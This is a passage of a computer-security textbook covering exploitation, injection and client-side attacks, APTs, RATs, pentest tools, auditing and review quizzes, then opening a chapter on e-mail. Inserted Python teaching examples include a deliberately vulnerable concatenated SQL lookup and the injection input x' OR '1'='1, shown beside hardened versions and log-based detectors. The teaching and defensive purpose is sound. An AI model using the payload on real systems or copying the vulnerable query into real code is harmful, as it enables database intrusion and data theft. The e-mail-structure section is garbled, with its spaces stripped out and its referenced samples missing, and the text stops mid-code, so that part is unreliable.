An attack that takes advantage of bugs or weaknesses in software is referred to as software exploitation. These bugs and weaknesses can be the result of poor design, poor testing, or poor coding practices. They can also result from what are sometimes called “features.” An example of this might be a debugging feature, which when used during debugging might allow unauthenticated individuals to execute programs on a system. If this feature remains in the program when the final version of the software is shipped, it creates a weakness that is just waiting to be exploited. Software exploitation is a preventable problem. Through the use of a secure development lifecycle process, coupled with tools such as threat modeling, bug tracking, fuzzing, and automated code analysis, many of the exploitable elements can be identified and corrected before release. Fuzzing is the automated process of applying large sets of inputs to a system and analyzing the output to determine exploitable weaknesses. This technique has been used by hackers to determine exploitable issues and is being adopted by savvy test teams. Identification of potential vulnerabilities by the testing team is the best defense against zero-day attacks, which are attacks against currently unknown vulnerabilities.

Another element that can be exploited is the error messages from an application. Good programming practice includes proper error and exception handling. Proper error handling with respect to the testing team includes the return of significant diagnostic information to enable troubleshooting. Once the code goes to production, the diagnostic information is not as important, as it does not help end users, and any potential information that can assist an attacker should be blocked from being presented to the end user. A prime example of this is in SQL injection attacks, where, through cleverly crafted injects, a database can be mapped and the data can even be returned to an attacker.
Buffer-Overflow Attack

A common weakness that has often been exploited is a buffer overflow, which occurs when a program is provided more data for input than it was designed to handle. For example, what would happen if a program that asks for a 7- to 10-character phone number instead receives a string of 150 characters? Many programs will provide some error checking to ensure that this will not cause a problem. Some programs, however, cannot handle this error, and the extra characters continue to fill memory, overwriting other portions of the program. This can result in a number of problems, including causing the program to abort or the system to crash. Under certain circumstances, the program can execute a command supplied by the attacker. Buffer overflows typically inherit the level of privilege enjoyed by the program being exploited. This is why programs that use root-level access are so dangerous when exploited with a buffer overflow, as the code that will execute does so at root-level access.

Exam Tip: Buffer overflows were one of the most common vulnerabilities over the past ten years, although awareness and efforts to eradicate them over the past couple of years have been very successful in new code.
Integer Overflow

An integer overflow is a programming error condition that occurs when a program attempts to store a numeric value, an integer, in a variable that is too small to hold it. The results vary by language and numeric type. In some cases, the value saturates the variable, assuming the maximum value for the defined type and no more. In other cases, especially with signed integers, it can roll over into a negative value, as the most significant bit is usually reserved for the sign of the number. This can create significant logic errors in a program. Integer overflows are easily tested for, and static code analyzers can point out where they are likely to occur. Given this, there are not any good excuses for having these errors end up in production code.
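Python integers never overflow, so the three behaviours the text distinguishes (rollover, saturation, and checked arithmetic that refuses the result) are modelled here for a signed 32-bit type. This is an added example, not code from the book. The two allocation-size functions illustrate the logic error a wrapped product causes, a request for many elements that wraps to a tiny or zero-byte allocation; they are assumptions about a typical program, not any real allocator API.

```python
"""Fixed-width signed 32-bit arithmetic as C would do it, modelled in Python (constructed example)."""

INT32_MAX = 2 ** 31 - 1
INT32_MIN = -(2 ** 31)


def overflows_int32(value):
    """True if the mathematically correct value does not fit in a signed 32-bit variable."""
    return value > INT32_MAX or value < INT32_MIN


def wrap_int32(value):
    """Two's-complement rollover: what an unchecked signed 32-bit operation silently does."""
    return (value + 2 ** 31) % 2 ** 32 - 2 ** 31


def saturate_int32(value):
    """Saturating arithmetic: clamp at the type's limits instead of rolling over."""
    return max(INT32_MIN, min(INT32_MAX, value))


def checked_add_int32(a, b):
    """Checked arithmetic: raise rather than return a value the type cannot hold."""
    result = a + b
    if overflows_int32(result):
        raise OverflowError(f"{a} + {b} does not fit in int32")
    return result


def buffer_size_unchecked(count, element_size):
    """The classic logic error: count * element_size wraps, and a tiny buffer is allocated
    for what the caller then treats as 'count' elements."""
    return wrap_int32(count * element_size)


def buffer_size_checked(count, element_size):
    """Validate the inputs and the product before using it as an allocation size."""
    if count < 0 or element_size < 0:
        raise ValueError("negative sizes are not allowed")
    product = count * element_size
    if overflows_int32(product):
        raise OverflowError("allocation size overflows int32")
    return product
```

Adding 1 to INT32_MAX rolls over to INT32_MIN under wrapping and stays at INT32_MAX under saturation; a request for 2^30 elements of 8 bytes wraps to an allocation of 0 bytes in the unchecked version, which is exactly the kind of error a static analyzer is expected to flag.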
Client-Side Attacks

The web browser has become the major application for users to engage resources across the Web. The popularity and the utility of this interface has made it a prime target for attackers to gain access and control over a system. A wide variety of attacks can occur via a browser, typically resulting from a failure to validate input properly before use. Unvalidated input can result in a series of injection attacks, header manipulation, and other forms of attack.

Tech Tip

All Input Is Evil

You can never trust input from a client machine. A client can manipulate the input, it can be changed in transit, and simple transmission errors can occur. The net result is that inputs can be manipulated, spoofed, or otherwise changed. The bottom line is never trust input—always verify it before use.

Injection Attacks

When user input is used without input validation, this gives an attacker the opportunity to craft input to create specific events to occur when the input is parsed and used by an application. SQL injection attacks involve the manipulation of input, resulting in a SQL statement that is different than intended by the designer. XML and LDAP injections are done in the same fashion. As SQL, XML, and LDAP are used to store data, these types of injection attacks can give an attacker access to data against business rules. Command injection attacks can occur when input is used in a fashion that allows command-line manipulation, giving an attacker command-line access at the same privilege level as the application.

Header Manipulations

When HTTP is being dynamically generated through the use of user inputs, unvalidated inputs can give attackers an opportunity to change HTTP elements. When user-supplied information is used in a header, it is possible to deploy a variety of attacks, including cache poisoning, cross-site scripting, cross-user defacement, page hijacking, cookie manipulation, and open redirect.
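Both the injection and the header-manipulation passages above come down to the same defect: user input reaching a sink (a SQL statement, an HTTP header, a redirect target) without validation. The following Python is an added example, not code from the book, showing the vulnerable form beside the hardened one for each sink: a SQL lookup built by string concatenation next to a parameterized query (using the standard sqlite3 module on an in-memory table), a header setter that rejects carriage-return and line-feed characters so a value cannot start a new header line, and a redirect helper restricted to an allow list. The table, the rows and the allow list are constructed for the example.

```python
"""Unvalidated input at three sinks, with the hardened form beside each (constructed example)."""
import re
import sqlite3


def make_db():
    """Constructed two-row user table in an in-memory SQLite database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password_hash TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("alice", "hash-a", "admin"), ("bob", "hash-b", "user")])
    return db


def lookup_vulnerable(db, name):
    """String concatenation: the input becomes part of the SQL grammar."""
    sql = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return db.execute(sql).fetchall()


def lookup_safe(db, name):
    """Parameterized query: the input is only ever a value, never SQL."""
    return db.execute("SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()


# Header values may contain printable ASCII and horizontal tab only. CR or LF in a
# user-controlled value would let the attacker append headers or a body of their
# own (response splitting), the root of the cache-poisoning and cookie attacks.
_HEADER_VALUE = re.compile(r"[\t\x20-\x7e]*")


def header_value_is_safe(value):
    return "\r" not in value and "\n" not in value and _HEADER_VALUE.fullmatch(value) is not None


def set_header(headers, name, value):
    """Add a header to the response dict only if the value passes validation."""
    if not header_value_is_safe(value):
        raise ValueError(f"refusing control characters in header {name!r}")
    headers[name] = value
    return headers


ALLOWED_REDIRECTS = {"/home", "/account"}


def redirect_target(requested):
    """Open-redirect defense: only site-relative paths from an allow list are honored."""
    return requested if requested in ALLOWED_REDIRECTS else "/home"
```

With the input `x' OR '1'='1` the concatenated query returns every row, while the parameterized query returns none, because the quote characters are data rather than SQL; the header check likewise turns an attempted `Set-Cookie` injection into a rejected value instead of a second header.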
Typo Squatting/URL Hijacking

Typo squatting is an attack form that involves capitalizing upon common typo errors. If a user mistypes a URL, then the result should be a 404 error, or “resource not found.” But if an attacker has registered the mistyped URL, then you would land on the attacker’s page. This attack pattern is also referred to as URL hijacking, fake URL, or brandjacking if the objective is to deceive based on branding. There are several reasons that an attacker will pursue this avenue of attack. The most obvious is one of a phishing attack. The fake site collects credentials, passing them on to the real site, and then steps out of the conversation to avoid detection once the credentials are obtained. It can also be used to plant drive-by malware on the victim machine. It can move the packets through an affiliate network, earning click-through revenue based on the typos. There are numerous other forms of attacks that can be perpetrated using a fake URL as a starting point.
Drive-by Download Attacks

Browsers are used to navigate the Internet, using HTTP and other protocols to bring files to users’ computers. Some of these files are images, some are scripts, and some are text based, and together they form the web pages that we see. Users don’t ask for each component—it is the job of the browser to identify the needed files and fetch them. A new type of attack takes advantage of this mechanism by initiating downloads of malware, whether a user clicks it or not. This automated download of materials is referred to as a drive-by download attack.

Exam Tip: Drive-by downloads can occur from a couple of different mechanisms. It is possible for an ad that is rotated into content on a reputable site to contain a drive-by download. Users don’t have control over what ads are presented. A second, more common method is a website that the user gets to either by mistyping a URL or by following a search link without vetting where they are clicking first. Just like cities can have bad neighborhoods, so too does the Internet, and surfing in a bad neighborhood can result in bad outcomes.
Watering Hole Attack

The most commonly recognized attack vectors are those that are direct to a target. Because of their incoming and direct nature, defenses are crafted to detect and defend against them. But what if the user “asked” for the attack by visiting a website? Just as a hunter waits near a watering hole for animals to come drink, attackers can plant malware at sites where users are likely to frequent. First identified by RSA, watering hole attacks involve the infecting of a target website with malware. In some of the cases detected, the infection was constrained to a specific geographical area. These are not simple attacks, yet they can be very effective at delivering malware to specific groups of end users. Watering hole attacks are complex to achieve and appear to be backed by nation-states and other high-resource attackers. In light of the stakes, the typical attack vector will be a zero-day attack to further avoid detection.

Tech Tip

Watering Hole Attacks

Watering hole attacks can occur from even innocent websites. Brian Krebs gives a strong analysis of watering hole attacks on his blog, Krebs on Security: http://krebsonsecurity.com/2012/09/espionage-hackers-target-watering-hole-sites.
Advanced Persistent Threat

The advanced persistent threat (APT) is a method of attack that primarily focuses on stealth and continuous presence on a system. APT is a very advanced method, requiring a team to maintain access and typically involves high-value targets. APT typically involves specially crafted attack vectors, coupled with phishing or spear phishing for the initial entry. Then techniques are employed to develop backdoors and multiple account access routes. The skill level of the attackers is typically exceedingly high and their aim is to completely own a system without being detected. Once the attackers have completely penetrated a system, including elements like the ability to read e-mails to watch for reports of detection, they can accomplish their goal of stealing materials. Their long-term objectives are to remain hidden and undetected, while harvesting information over months and years. APTs are the attack method of choice for nation-states and industrial espionage.

Tech Tip

Signs of APT Attack

The following are indications of an APT attack:

• Off-hours activity: If logs demonstrate “normal” activity at times when your workers are at home, this is a sign of compromised accounts. Look for large numbers of occurrences, as APT attackers tend to use multiple accounts.
• Finding multiple backdoor Trojans/remote access Trojans: When security scans begin to find a lot of malware, this can be a sign of APTs.
• Finding unknown files: APTs tend to bundle exfiltration data and keep it in encrypted form before slowly siphoning it out. Discovery of large files of unknown origin can be these bundles.
• Finding spear phishing e-mails and pass-the-hash tools: These advanced attack methods are indications of an advanced adversary.
• Strange data flows: This is the most telltale sign. Finding unusual data flows, movement of data not in the normal course of business, indicates leakage.
Remote Access Trojans

Remote access Trojans (RATs) are malware designed to enable remote access to a machine. This functionality is similar to remote desktop administration, but rather than being visible to a user, it is hidden in the system. RATs enable attackers to have a way back into a system. The principal use of a RAT is to enable re-entry to a system and/or collect data on a system. Common data collection functions performed by RATs include capture of webcam images, keystrokes and mouse movements, and image capture of the screen. When these data elements are combined they can defeat image-based password systems. Complete shell access to the OS is typical, enabling the attacker full access to the system and processes.

A key function of a RAT is to provide a periodic beacon out, so even if firewalls and other security devices block unrequested packets, the beacon function makes them requested, bypassing many security checks. RATs have existed for years, and more recently, custom RATs, which avoid AV detection, are being used in APT-style attacks.
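Two of the indicators above can be turned directly into detection logic: the off-hours activity from the Signs of APT Attack list, and the periodic beacon a RAT sends so that its traffic looks requested. The following Python is an added example, not code from the book. It runs over two constructed log excerpts (an authentication log and an outbound-connection log, both invented for the example, with addresses from documentation ranges): the first check counts logins outside business hours per account, the second looks for source/destination pairs whose connection intervals are nearly constant, which is what a beacon on a fixed timer looks like even when the destination is unknown. Business hours, the minimum connection count and the jitter threshold are assumed policy values.

```python
"""Off-hours login and beaconing detection over constructed log lines (added example)."""
from collections import defaultdict
from datetime import datetime
import statistics

# Constructed authentication log: ISO timestamp, user, event.
AUTH_LOG = """\
2016-03-01T09:12:00 alice login
2016-03-01T02:14:00 svc_backup login
2016-03-01T02:47:00 svc_backup login
2016-03-01T03:05:00 svc_backup login
2016-03-01T14:30:00 bob login
"""

# Constructed outbound-connection log: ISO timestamp, source, destination:port.
CONN_LOG = """\
2016-03-01T09:00:00 10.0.0.5 198.51.100.7:443
2016-03-01T09:10:02 10.0.0.5 198.51.100.7:443
2016-03-01T09:19:58 10.0.0.5 198.51.100.7:443
2016-03-01T09:30:01 10.0.0.5 198.51.100.7:443
2016-03-01T09:03:00 10.0.0.5 203.0.113.20:443
2016-03-01T09:41:00 10.0.0.5 203.0.113.20:443
2016-03-01T11:05:00 10.0.0.5 203.0.113.20:443
"""


def off_hours_logins(log, start_hour=8, end_hour=18, min_count=2):
    """Accounts that logged in outside [start_hour, end_hour) at least min_count times."""
    counts = defaultdict(int)
    for line in log.splitlines():
        timestamp, user, _event = line.split()
        hour = datetime.fromisoformat(timestamp).hour
        if hour < start_hour or hour >= end_hour:
            counts[user] += 1
    return {user: n for user, n in counts.items() if n >= min_count}


def beacon_candidates(log, min_connections=4, max_jitter_ratio=0.05):
    """(src, dst) pairs whose inter-connection gaps are nearly constant; value is the period in s."""
    seen = defaultdict(list)
    for line in log.splitlines():
        timestamp, src, dst = line.split()
        seen[(src, dst)].append(datetime.fromisoformat(timestamp))
    found = {}
    for pair, stamps in seen.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        # Coefficient of variation: a timer-driven beacon has very little spread
        # relative to its period, while human browsing is bursty.
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_jitter_ratio:
            found[pair] = round(mean)
    return found
```

In the constructed data the service account is flagged for three early-morning logins, and the four connections to 198.51.100.7 spaced roughly ten minutes apart are reported as a 600-second beacon, while the irregular connections to 203.0.113.20 are not.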
Tools

There are a variety of toolsets used by security professionals that could also be used for malicious purposes. These toolsets are used by penetration testers when testing the security posture of a system. The same tools in the hands of an adversary can be used for malicious purposes.

Metasploit

Metasploit is a framework that enables attackers to exploit systems (bypass controls) and inject payloads (attack code) into a system. Metasploit is widely distributed, powerful, and one of the most popular tools used by attackers. When new vulnerabilities are discovered in systems, Metasploit exploit modules are quickly created in the community, making this tool the go-to tool for most professionals.

BackTrack/Kali

BackTrack is a Linux distribution that is preloaded with many security tools. The current version is called Kali Linux. It includes a whole host of preconfigured, preloaded tools, including Metasploit, Social-Engineering Toolkit, and others.

Social-Engineering Toolkit

The Social-Engineering Toolkit (SET) is a set of tools that can be used to target attacks toward the people using systems. It has applets that can be used to create phishing e-mails, Java attack code, and other social engineering–type attacks. The SET is included in BackTrack/Kali and other distributions.

Cobalt Strike

Cobalt Strike is a powerful application that can replicate advanced threats and assist in the execution of targeted attacks on systems. Cobalt Strike expands the Armitage tool’s capabilities, adding advanced attack methods.

Core Impact

Core Impact is an expensive commercial suite of penetration test tools. It has a wide spectrum of tools and proven attack abilities across an enterprise. Although expensive, the level of automation and integration makes this a powerful suite of tools.

Burp Suite

Burp Suite began as a port scanner tool with limited additional functionality in the arena of intercepting proxies, web application scanning, and web-based content. Burp Suite is a commercial tool, but it is reasonably priced and well liked and utilized in the pen-testing marketplace.
Auditing

Auditing, in the financial community, is done to verify the accuracy and integrity of financial records. Many standards have been established in the financial community about how to record and report a company’s financial status correctly. In the computer security world, auditing serves a similar function. It is a process of assessing the security state of an organization compared against an established standard. The important elements here are the standards. Organizations from different communities may have widely different standards, and any audit will need to consider the appropriate elements for the specific community. Audits differ from security or vulnerability assessments in that assessments measure the security posture of the organization but may do so without any mandated standards against which to compare them. In a security assessment, general security “best practices” can be used, but they may lack the regulatory teeth that standards often provide. Penetration tests can also be encountered—these tests are conducted against an organization to determine whether any holes in the organization’s security can be found. The goal of the penetration test is to penetrate the security rather than measure it against some standard. Penetration tests are often viewed as white-hat hacking in that the methods used often mirror those that attackers (often called black hats) might use.

One of the key management principles involves the measurement of a process. When referring to security, until it is measured, one should take answers with a grain of salt. Logging information is only good if you examine the logs and analyze them. Security controls work, but auditing their use provides assurance of their protection.

You should conduct some form of security audit or assessment on a regular basis. Your organization might spend quite a bit on security, and it is important to measure how effective the efforts have been. In certain communities, audits can be regulated on a periodic basis with very specific standards that must be measured against. Even if your organization is not part of such a community, periodic assessments are important. Many particulars can be evaluated during an assessment, but at a minimum, the security perimeter (with all of its components, including host-based security) should be examined, as well as the organization’s policies, procedures, and guidelines governing security. Employee training is another aspect that should be studied, since employees are the targets of social-engineering and password-guessing attacks. Security audits, assessments, and penetration tests are a big business, and a number of organizations can perform them for you. The costs of these vary widely depending on the extent of the tests you want, the background of the company you are contracting with, and the size of the organization to be tested.

A powerful mechanism for detecting security incidents is the use of security logs. For logs to be effective, however, they require monitoring. Monitoring of event logs can provide information concerning the events that have been logged. This requires making decisions in advance about the items to be logged. Logging too many items uses a lot of space and increases the workload for personnel who are assigned the task of reading those logs. The same is true for security, access, audit, and application-specific logs. The bottom line is that, although logs are valuable, preparation is needed to determine the correct items to log and the mechanisms by which logs are reviewed. Security Information Event Management (SIEM) software can assist in log file analysis.
Perform Routine Audits

As part of any good security program, administrators must perform periodic audits to ensure things “are as they should be” with regard to users, systems, policies, and procedures. Installing and configuring security mechanisms is important, but they must be reviewed on a regularly scheduled basis to ensure they are effective, up to date, and serving their intended function. Here are some examples, but by no means a complete list, of items that should be audited on a regular basis:

• User access: Administrators should review which users are accessing the systems, when they are doing so, what resources they are using, and so on. Administrators should look closely for users accessing resources improperly or accessing legitimate resources at unusual times.
• User rights: When a user changes jobs or responsibilities, she will likely need to be assigned different access permissions; she may gain access to new resources and lose access to others. To ensure that users have access only to the resources and capabilities they need for their current positions, all user rights should be audited periodically.
• Storage: Many organizations have policies governing what can be stored on “company” resources and how much space can be used by a given user or group. Periodic audits help to ensure that no undesirable or illegal materials exist on organizational resources.
• Retention: In some organizations, how long a particular document or record is stored can be as important as what is being stored. A records retention policy helps to define what is stored, how it is stored, how long it is stored, and how it is disposed of when the time comes. Periodic audits help to ensure that records or documents are removed when they are no longer needed.
• Firewall rules: Periodic audits of firewall rules are important to ensure the firewall is filtering traffic as desired and to help ensure that “temporary” rules do not end up as permanent additions to the rule set.
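Two of the items in the list above, user rights and firewall rules, lend themselves to automated checks that can run on the audit schedule. The following Python is an added example, not code from the book. It compares each user’s actual group membership against the groups their recorded role is entitled to (the excess is what a job change or a departure left behind) and walks a firewall rule set looking for two things the text warns about: an allow-everything rule, and a rule tagged as temporary whose expiry date has passed. The rule set, the user records and the role-to-group mapping are constructed for the example; real audits would pull them from the firewall and the directory.

```python
"""Routine-audit checks over constructed firewall rules and user-rights records (added example)."""
from datetime import date

# Constructed rule set; an 'expires' date marks a rule that was meant to be temporary.
FIREWALL_RULES = [
    {"id": 1, "action": "allow", "src": "10.0.0.0/8", "dst": "10.1.1.5", "port": 443},
    {"id": 2, "action": "allow", "src": "any", "dst": "any", "port": "any",
     "comment": "temporary vendor access", "expires": date(2016, 1, 15)},
    {"id": 3, "action": "allow", "src": "198.51.100.0/24", "dst": "10.1.1.9", "port": 22,
     "expires": date(2016, 6, 30)},
    {"id": 4, "action": "deny", "src": "any", "dst": "any", "port": "any"},
]

# Constructed user-rights records: the role HR has on file versus the groups actually held.
USER_RIGHTS = [
    {"user": "alice", "hr_role": "finance", "groups": {"finance", "domain-admins"}},
    {"user": "bob", "hr_role": "helpdesk", "groups": {"helpdesk"}},
    {"user": "carol", "hr_role": "terminated", "groups": {"engineering"}},
]

# Which groups each role is entitled to; a terminated user is entitled to none.
ROLE_GROUPS = {"finance": {"finance"}, "helpdesk": {"helpdesk"}, "terminated": set()}


def audit_firewall(rules, today):
    """Return (rule id, finding) pairs for over-broad and expired temporary rules."""
    findings = []
    for rule in rules:
        if rule["action"] == "allow" and rule["src"] == "any" and rule["dst"] == "any":
            findings.append((rule["id"], "allow any-any"))
        expires = rule.get("expires")
        if expires and expires < today:
            findings.append((rule["id"], f"temporary rule expired on {expires.isoformat()}"))
    return findings


def audit_user_rights(records, role_groups):
    """Return (user, excess groups) for every user holding groups their role does not grant."""
    findings = []
    for record in records:
        excess = record["groups"] - role_groups.get(record["hr_role"], set())
        if excess:
            findings.append((record["user"], sorted(excess)))
    return findings
```

Run against the constructed data on 1 March 2016, the firewall audit reports rule 2 twice (it is both any-to-any and six weeks past its expiry) and leaves rule 3, whose exception is still current, alone; the rights audit reports alice’s leftover domain-admins membership and carol’s group membership surviving her termination.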
Chapter 15 Review

Lab Manual Exercises

The following lab exercises from the companion lab manual, Principles of Computer Security Lab Manual, Fourth Edition, provide practical application of material covered in this chapter:

Chapter Summary

After reading this chapter and completing the exercises, you should understand the following aspects of attacks and malware.

Describe the various types of computer and network attacks, including denial-of-service, spoofing, hijacking, and password guessing
• Understand how denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks are performed and the defenses against them.
• Both packet headers and e-mail headers can be spoofed to take advantage of the trust users place in these data elements, even when they are not protected from change.
• Understand how session hijacking and man-in-the-middle attacks are performed and what the defenses are against these attacks.
• Password systems can have numerous vulnerabilities, some based on the system and some on the choice of password itself.

Identify the different types of malicious software that exist, including viruses, worms, Trojan horses, logic bombs, time bombs, and rootkits
• Viruses are pieces of malware that require a file to infect a system.
• Worms are pieces of malware that can exist without infecting a file.
• Trojan horses are pieces of malware disguised as something else, something the user wants or finds useful.
• Logic bombs trigger when specific events occur in code, allowing an attack to be timed against an event.
• Time bombs are delayed malware designed to occur after a set period of time or on a specific date.
• Rootkits are pieces of malware designed to alter the lower-level functions of a system in a manner to escape detection.

Explain how social engineering can be used as a means to gain access to computers and networks
• Social engineering attacks are attacks against the operators and users of a system.
• Training and awareness is the best defensive measure against social engineering.

Describe the importance of auditing and what should be audited
• Logging is important because logs can provide information associated with attacks.
• Auditing is an essential component of a comprehensive security system.
Key Terms

auditing, backdoor, birthday attack, botnet, buffer overflow, denial-of-service (DoS) attack, distributed denial-of-service (DDoS) attack, DNS kiting, drive-by download attack, integer overflow, logic bomb, malware, man-in-the-middle attack, null session, pharming, phishing, ransomware, replay attack, rootkit, sequence number, smurf attack, sniffing, spear phishing, spoofing, spyware, SYN flood, TCP/IP hijacking, Trojan, typo squatting, virus, worm, zombie
Key Terms Quiz

Use terms from the Key Terms list to complete the sentences that follow. Don’t use the same term more than once. Not all terms will be used.

1. Changing a source IP address for malicious purposes is an example of _______________.
2. A(n) _______________ is a way back into a machine via an unauthorized channel of access.
3. A malicious proxy could create a(n) _______________ attack.
4. Abusing the TCP handshake in an effort to overuse server resources can be done using a(n) _______________.
5. The main TCP/IP defense against a man-in-the-middle attack is the use of a(n) _______________.
6. Holding a DNS name without paying is called _______________.
7. When a keylogger is installed as malware, it is referred to as _______________.
8. Rendering a resource useless is called a(n) _______________.
9. An attack designed to match any user’s password as opposed to a specific user’s password is an example of a(n) _______________.
10. A NIC can be set in promiscuous mode to enable _______________.
Multiple-Choice Quiz

1. A SYN flood is an example of what type of attack?
A. Malicious code
B. Denial-of-service
C. Man-in-the-middle
D. Spoofing

2. An attack in which the attacker simply listens for all traffic being transmitted across a network, in the hope of viewing something such as a user ID and password combination, is known as:
A. A man-in-the-middle attack
B. A denial-of-service attack
C. A sniffing attack
D. A backdoor attack

3. Which attack takes advantage of a trusted relationship that exists between two systems?
A. Spoofing
B. Password guessing
C. Sniffing
D. Brute-force

4. In what type of attack does an attacker resend the series of commands and codes used in a financial transaction to cause the transaction to be conducted multiple times?
A. Spoofing
B. Man-in-the-middle
C. Replay
D. Backdoor

5. Rootkits are challenging security problems because:
A. They can be invisible to the operating system and end user.
B. Their true functionality can be cloaked, preventing analysis.
C. They can do virtually anything an operating system can do.
D. All of the above.

6. An attack in which an attacker attempts to lie and misrepresent himself in order to gain access to information that can be useful in an attack is known as:
A. Social science
B. White-hat hacking
C. Social engineering
D. Social manipulation

7. The first step in an attack on a computer system consists of:
A. Gathering as much information about the target system as possible
B. Obtaining as much information about the organization in which the target lies as possible
C. Searching for possible exploits that can be used against known vulnerabilities
D. Searching for specific vulnerabilities that may exist in the target’s operating system or software applications

8. The best way to minimize possible avenues of attack for your system is to:
A. Install a firewall and check the logs daily.
B. Monitor your intrusion detection system for possible attacks.
C. Limit the information that can be obtained on your organization and the services that are run by your Internet-visible systems.
D. Ensure that all patches have been applied for the services that are offered by your system.

9. A war-driving attack is an attempt to exploit what technology?
A. Fiber-optic networks, whose cables often run along roads and bridges
B. Cellular telephones
C. The public switched telephone network (PSTN)
D. Wireless networks

10. Malicious code that is set to execute its payload on a specific date or at a specific time is known as:
A. A logic bomb
B. A Trojan horse
C. A virus
D. A time bomb
Essay Quiz

1. Compare and contrast port scanning and ping sweeps.
2. What is the best practice to employ to mitigate malware effects on a machine?

Lab Projects

• Lab Project 15.1 Using the Internet, research password-cracking tools. Then, using a tool of choice, examine how easy it is to crack passwords on Windows- and UNIX-based systems. Create a series of accounts with different complexities of passwords and see how well they fare.
• Lab Project 15.2 Obtain a copy of the nmap scanning tool. Explore the various command-line options to scan networks, fingerprint operating systems, and perform other network-mapping functions.

Note: Students should try these options, but only in a lab environment, not across the Internet from their home ISP.
Chapter 16 E-Mail and Instant Messaging

The “free” distribution of unwelcome or misleading messages to thousands of people is an annoying and sometimes destructive use of the Internet’s unprecedented efficiency.
—BILL GATES, NEW YORK TIMES, 1998

In this chapter, you will learn how to
• Describe security issues associated with e-mail
• Implement security practices for e-mail
• Detail the security issues of instant messaging protocols

E-mail is the most popular application on company networks. With over 2.6 billion e-mail users, 4.3 billion e-mail accounts and more than 200 billion e-mails per year, the usage numbers are staggering. The split between business and personal email is 55/45 percent, respectively. The total amount of spam is unknown, but even after extensive filtering, spam averages nearly 10 percent of inbox traffic.
How E-Mail Works

E-mail started with mailbox programs on early time-sharing machines, allowing researchers to leave messages for others using the same machine. The first intermachine e-mail was sent in 1972, and a new era in person-to-person communication was launched. E-mail proliferated, but it remained unsecured, only partly because most e-mail is sent in plaintext, providing no privacy in its default form. Current e-mail in its use is not different from its earlier versions; it’s still a simple way to send a relatively short text message to another user. Users’ dependence on e-mail has grown with the number of people accessing the Internet.

Internet e-mail depends on three primary protocols, SMTP, POP3, and IMAP. Simple Mail Transfer Protocol (SMTP) is the method by which mail is sent to the server as well as from server to server. SMTP by default uses TCP port 25. POP3 stands for Post Office Protocol version 3, which by default uses TCP port 110. POP3 is a method by which a client computer may connect to a server and download new messages. POP3 has been partly replaced by IMAP, or Internet Message Access Protocol, which uses TCP port 143 by default. IMAP is similar to POP3 in that it allows the client to retrieve messages from the server, but IMAP typically works in greater synchronization; for example, e-mails are left on the server until the client deletes them in the client, at which time IMAP instructs the server to delete them. As e-mail services became more standardized, the methods of transmission became easier to attack as they were not strange proprietary protocols. Also, as the world became more connected, there were many more available targets for the malware and commercial e-mails.
Tech Tip

E-mail and Firewalls

For e-mail applications to work with e-mail servers, they need to communicate across specific channels. To ensure communication, TCP ports 25, 110, and 143 need to be open on clients that need to connect to mail servers. This is for SMTP, POP3, and IMAP, respectively.

Secure versions of the common communication protocols exist via the STARTTLS method. STARTTLS is a means of using Transport Layer Security (TLS) to secure a communication channel for text-based communication protocols. Table 16.1 shows the port assignments associated with STARTTLS.

Table 16.1 STARTTLS Port Assignments
E-mail appears to be a client-to-client communication, between sender and receiver. In reality, a lot of steps are involved, as shown in Figure 16.1 and described here:

• Figure 16.1 How e-mail works

1. A user composes and sends an e-mail from the user’s client machine.
2. The e-mail is sent to the client’s e-mail server. In an Internet service provider (ISP) environment, this could be via the ISP. In the case of webmail, it is the mail service (Gmail, Hotmail/Live, etc.). In a corporate environment it is the corporate mail server.
3. a. The receiving e-mail server scans the e-mail for viruses, malware, and other threats.
   b. The mail server uses DNS to obtain the recipient e-mail server address via an MX record.
4. The mail server prepares the e-mail for transit across the Internet to the recipient’s mail server.
5. The e-mail is routed across the Internet.
6. The receiving e-mail server scans the e-mail for viruses, malware, and other threats.
7. The e-mail is passed to the recipient’s in-box, where it can be read.

This list of steps leaves out a lot of details, but it provides the main steps in e-mail transference. The steps are remarkably similar for instant messaging applications as well. Rather than in-boxes and e-mail as a medium, the instant messaging apps deliver the text messages directly to the screen of the app.

In technical terms, the application on the sender’s machine is referred to as a mail user agent (MUA), and the mail server is a mail transfer agent (MTA). The recipient’s mail server is referred to as a mail delivery agent (MDA). These terms are used when discussing mail transfers to provide accuracy in the conversation. For communication from the MUA to the MTA, SMTP (port 25) is used, and communication from MTA to MTA is also SMTP. The protocol used for communication from the MDA to the MUA on the recipient machine is typically POP/IMAP.
E-MailStructureE-mailisstructuredintwoelements,aheaderandthebody.TheentiremessageissentviaplainASCIItext,withattachmentsincludedusingBase64encoding.Thee-mailheaderprovidesinformationforthehandlingofthee-mailbetweenMUAs,MTAs,andMDAs.Thefollowingisasamplee-mailheader:
Thespecificelementsshowninthisheaderwillbeexaminedthroughoutthischapter.Whatisimportanttonoteisthattheformatofthemessageanditsattachmentsareinplaintext.
MIMEWhenamessagehasanattachment,theprotocolusedtodeliverthemessageisMultipurposeInternetMailExtensions(MIME).Thisprotocolallowstheexchangeofdifferentkindsofdataacrosstext-basede-mailsystems.WhenMIMEisused,itismarkedintheheaderofthee-mail,alongwithsupportingelementstofacilitatedecoding.ThefollowingisanexcerptfromaheaderthathasMIMEelements:
Thee-mailtexthasbeenreplacedwith<HTMLE-MAILmessagegoeshere>andtheJPEGimageistruncated,butthestructureofthesampleshowshowcontentcanbeencodedandincludedinane-mail.
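As an added illustration of the structure just described (not code from the book), the Python program below builds a message with an HTML body and a JPEG attachment using the standard library's email package, then parses it back the way a receiving agent would, confirming that the whole message, Base64-encoded attachment included, travels as 7-bit ASCII text. The addresses and the JPEG bytes are constructed sample data.

```python
"""Build and inspect a MIME multipart message (added example, not from the book).

Shows how an HTML body and a binary attachment are carried as plain ASCII text
(the attachment Base64-encoded) and how a receiving agent walks the MIME tree.
The addresses and the JPEG bytes below are constructed sample data.
"""
import base64
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Constructed sample: a tiny stand-in for a JPEG file (real JPEGs start with FF D8 FF).
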